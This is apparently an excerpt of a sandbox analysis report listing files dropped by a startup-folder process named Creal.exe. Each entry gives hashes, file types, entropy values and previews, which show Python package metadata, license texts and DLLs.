                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15579
                                                                                                                                                                                                                                                      Entropy (8bit):5.5670696451446435
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:1XeTB7oz5jF4EHRThXsI4WPm6LciTwqU+NX6in5hqw/t+B:1Xk7ohCE3sIPm6LciTwqU+96inhgB
                                                                                                                                                                                                                                                      MD5:6BA7EACDC603A21F205A9F4CF0FBF12E
                                                                                                                                                                                                                                                      SHA1:55CEB7C05E30C49B582E7B2C4CE03E2FE9351CC1
                                                                                                                                                                                                                                                      SHA-256:4AE8807DEAA2C41CB02FFB19601220AF425EA392D97375B85F18D1449F67F44F
                                                                                                                                                                                                                                                      SHA-512:E621D6059D456940A953E7FA12D90988F9E14D3CD41018EEFB1788514B580A589860306A3818AB8B2CDEF3FE3A341E8324B4F2F31EB64D249BBF46E8E9894C3D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:cryptography-43.0.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-43.0.3.dist-info/METADATA,sha256=6zbg5CUehHnvNpZEQHVe8ivt1BG6h6k_cm-o5bsOZLA,5440..cryptography-43.0.3.dist-info/RECORD,,..cryptography-43.0.3.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-43.0.3.dist-info/WHEEL,sha256=8_4EnrLvbhzH224YH8WypoB7HFn-vpbwr_zHlr3XUBI,94..cryptography-43.0.3.dist-info/license_files/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-43.0.3.dist-info/license_files/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-43.0.3.dist-info/license_files/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=-FkHKD9mSuEfH37wsSKnQzJZmL5zUAUTpB5OeUQjPE0,445..cryptography/__init__.py,sha256=mthuUrTd4FROCpUYrTIqhjz6s6T9djAZrV7nZ1oMm2o,364..cryptography/__pycache__/__about__.cpython-313.pyc,,..cryptography/__pycache__/__ini
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):94
                                                                                                                                                                                                                                                      Entropy (8bit):5.016084900984752
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
                                                                                                                                                                                                                                                      MD5:C869D30012A100ADEB75860F3810C8C9
                                                                                                                                                                                                                                                      SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
                                                                                                                                                                                                                                                      SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
                                                                                                                                                                                                                                                      SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197
                                                                                                                                                                                                                                                      Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                                      MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                                      SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                                      SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                                      SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11360
                                                                                                                                                                                                                                                      Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                                      MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                                      SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                                      SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                                      SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1532
                                                                                                                                                                                                                                                      Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                                      MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                                      SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                                      SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                                      SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7834624
                                                                                                                                                                                                                                                      Entropy (8bit):6.517862303223651
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:oFNZj7fIo9W67PapgzJTkrXyzNzpXAbuiqCgIns3mYEXEqMrIU6i7GtlqdVwASO/:QI9X/gIFYEXME+oFNr5VQCJheq4BsxH
                                                                                                                                                                                                                                                      MD5:BFD28B03A4C32A9BCB001451FD002F67
                                                                                                                                                                                                                                                      SHA1:DD528FD5F4775E16B2E743D3188B66F1174807B2
                                                                                                                                                                                                                                                      SHA-256:8EF0F404A8BFF12FD6621D8F4F209499613F565777FE1C2A680E8A18F312D5A7
                                                                                                                                                                                                                                                      SHA-512:6DC39638435F147B399826E34F78571D7ED2ED1232275E213A2B020224C0645E379F74A0CA5DE86930D3348981C8BB03BBBECFA601F8BA781417E7114662DDEE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5232408
                                                                                                                                                                                                                                                      Entropy (8bit):5.940072183736028
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                                                                                                                      MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                                                                                                                      SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                                                                                                                      SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                                                                                                                      SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):39696
                                                                                                                                                                                                                                                      Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                                      MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                                      SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                                      SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                                      SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):792856
                                                                                                                                                                                                                                                      Entropy (8bit):5.57949182561317
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                                                                                                                      MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                                                                                                                      SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                                                                                                                      SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                                                                                                                      SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):201488
                                                                                                                                                                                                                                                      Entropy (8bit):6.375994899027017
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:cAPHiRwroqoLHMpCSNVysh9CV2i6P/1vTg:6wrExSU6PdvTg
                                                                                                                                                                                                                                                      MD5:CF2C3D127F11CB2C026E151956745564
                                                                                                                                                                                                                                                      SHA1:B1C8C432FC737D6F455D8F642A4F79AD95A97BD3
                                                                                                                                                                                                                                                      SHA-256:D3E81017B4A82AE1B85E8CD6B9B7EB04D8817E29E5BC9ECE549AC24C8BB2FF23
                                                                                                                                                                                                                                                      SHA-512:FE3A9C8122FFFF4AF7A51DF39D40DF18E9DB3BC4AED6B161A4BE40A586AC93C1901ACDF64CC5BFFF6975D22073558FC7A37399D016296432057B8150848F636E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):70416
                                                                                                                                                                                                                                                      Entropy (8bit):6.1258200129869405
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:pQEotsskOv6pWVCB4p/uKlZPRQcFIc9qunV0Jku/YFI1Hu1wEBbCpVNyD6VdPxiD:/otssyKcunV8PjZIJy0i7SyWH1
                                                                                                                                                                                                                                                      MD5:16855EBEF31C5B1EBE767F1C617645B3
                                                                                                                                                                                                                                                      SHA1:315521F3A748ABFA35CD4D48E8DD09D0556D989B
                                                                                                                                                                                                                                                      SHA-256:A5C6A329698490A035133433928D04368CE6285BB91A9D074FC285DE4C9A32A4
                                                                                                                                                                                                                                                      SHA-512:C3957B3BD36B10C7AD6EA1FF3BC7BD65CDCEB3E6B4195A25D0649AA0DA179276CE170DA903D77B50A38FC3D5147A45BE32DBCFDBFBF76CC46301199C529ADEA4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6083856
                                                                                                                                                                                                                                                      Entropy (8bit):6.126922729922386
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:49152:fXGc3O7T4DKX+vLFMmKYxiAYNBD987KdJlI9HbeX2jrgQcw6Zc4h67mM+XDQ3bLi:Of42zJiwJl/YF7v3vaHDMiEN3Kr
                                                                                                                                                                                                                                                      MD5:B9DE917B925DD246B709BB4233777EFD
                                                                                                                                                                                                                                                      SHA1:775F258D8B530C6EA9F0DD3D1D0B61C1948C25D2
                                                                                                                                                                                                                                                      SHA-256:0C0A66505093B6A4BB3475F716BD3D9552095776F6A124709C13B3F9552C7D99
                                                                                                                                                                                                                                                      SHA-512:F4BF3398F50FDD3AB7E3F02C1F940B4C8B5650ED7AF16C626CCD1B934053BA73A35F96DA03B349C1EB614BB23E0BC6B5CC58B07B7553A5C93C6D23124F324A33
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):30992
                                                                                                                                                                                                                                                      Entropy (8bit):6.554484610649281
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
                                                                                                                                                                                                                                                      MD5:20831703486869B470006941B4D996F2
                                                                                                                                                                                                                                                      SHA1:28851DFD43706542CD3EF1B88B5E2749562DFEE0
                                                                                                                                                                                                                                                      SHA-256:78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
                                                                                                                                                                                                                                                      SHA-512:4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4
                                                                                                                                                                                                                                                      Entropy (8bit):1.5
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                      MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                      SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                      SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                      SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:pip.
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11358
                                                                                                                                                                                                                                                      Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                                      MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                                      SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                                      SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                                      SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4648
                                                                                                                                                                                                                                                      Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                                      MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                                      SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                                      SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                                      SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2518
                                                                                                                                                                                                                                                      Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                                      MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                                      SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                                      SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                                                      SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                      Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                                                      MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                                                      SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                                                      SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                                                      SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):19
                                                                                                                                                                                                                                                      Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                                      MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                                      SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                                      SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
